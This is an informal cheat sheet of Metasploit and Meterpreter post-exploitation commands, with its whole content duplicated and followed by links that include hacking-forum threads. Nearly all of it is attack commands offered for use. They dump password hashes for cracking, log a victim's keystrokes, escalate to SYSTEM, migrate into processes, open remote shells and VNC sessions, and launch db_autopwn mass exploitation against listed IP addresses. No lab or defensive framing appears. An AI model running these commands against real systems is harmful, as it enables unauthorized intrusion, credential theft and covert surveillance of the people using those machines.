Metasploit: some commands
Show targets and set target force the exploit to see a certain OS in the victim machine
In meterpreter run:
hashdump (then you have to copy-past the hashes into a file and run john
ps + migrate + getpid + getuid
Log keystrokes:
use priv
keyscan_start
keyscan_dump
keyscan_stop
Became admin
use priv
getsystem
getuid
ps (you will see more processes that before)
Launch a shell from meterpreter
sysinfo
migrate
getuid
shell
Launch a shell from meterpreter (2)
sysinfo
execute -f cmd.exe -i
Automatic attack!
db_driver mysql
(start mysql server)
db_connect root:toor@127.0.0.1/db_autopwn
db_nmap 129.168.6.145 -p445
db_autopwn -p-e -q (it will scan all the IPs in the db) in alternative use the below
db_autopwn -p -t -e -r -PI 445 -I 192.168.6.130 (it will attack only the port 445 on the machine with IP 192.168.6.130) use PX if you want to exclude a port
sessions -v
sessions -i
sysinfo
execute -f cmd.exe -i OR run vnc OR run vnc -t OR run vnc -t -p 443
Update metasploit
from the metploit console type: msfupdate
see also
www.rapid7.com/docs/ms-pro-user-guide.pdf
www.ol-service.com/sikurezza/doc/netcat_eng.pdf
Other links (not checked)
http://blog.metasploit.com/2006/09/metasploit-30-automated-exploitation.html
http://seclists.org/metasploit/2010/q2/74
http://blog.metasploit.com/2007_04_01_archive.html
http://dev.metasploit.com/redmine/issues/1448
http://www.hackforums.net/archive/index.php/thread-1344446.html
http://www.hackforums.net/archive/index.php/thread-67340-5.html
http://ihackmyi.com/topic/95518-metasploit-help/
In meterpreter run:
hashdump (then you have to copy-past the hashes into a file and run john
ps + migrate
Log keystrokes:
use priv
keyscan_start
keyscan_dump
keyscan_stop
Became admin
use priv
getsystem
getuid
ps (you will see more processes that before)
Launch a shell from meterpreter
sysinfo
migrate
getuid
shell
Launch a shell from meterpreter (2)
sysinfo
execute -f cmd.exe -i
Automatic attack!
db_driver mysql
(start mysql server)
db_connect root:toor@127.0.0.1/db_autopwn
db_nmap 129.168.6.145 -p445
db_autopwn -p-e -q (it will scan all the IPs in the db) in alternative use the below
db_autopwn -p -t -e -r -PI 445 -I 192.168.6.130 (it will attack only the port 445 on the machine with IP 192.168.6.130) use PX if you want to exclude a port
sessions -v
sessions -i
sysinfo
execute -f cmd.exe -i OR run vnc OR run vnc -t OR run vnc -t -p 443
Update metasploit
from the metploit console type: msfupdate
see also
www.rapid7.com/docs/ms-pro-user-guide.pdf
www.ol-service.com/sikurezza/doc/netcat_eng.pdf
Other links (not checked)
http://blog.metasploit.com/2006/09/metasploit-30-automated-exploitation.html
http://seclists.org/metasploit/2010/q2/74
http://blog.metasploit.com/2007_04_01_archive.html
http://dev.metasploit.com/redmine/issues/1448
http://www.hackforums.net/archive/index.php/thread-1344446.html
http://www.hackforums.net/archive/index.php/thread-67340-5.html
http://ihackmyi.com/topic/95518-metasploit-help/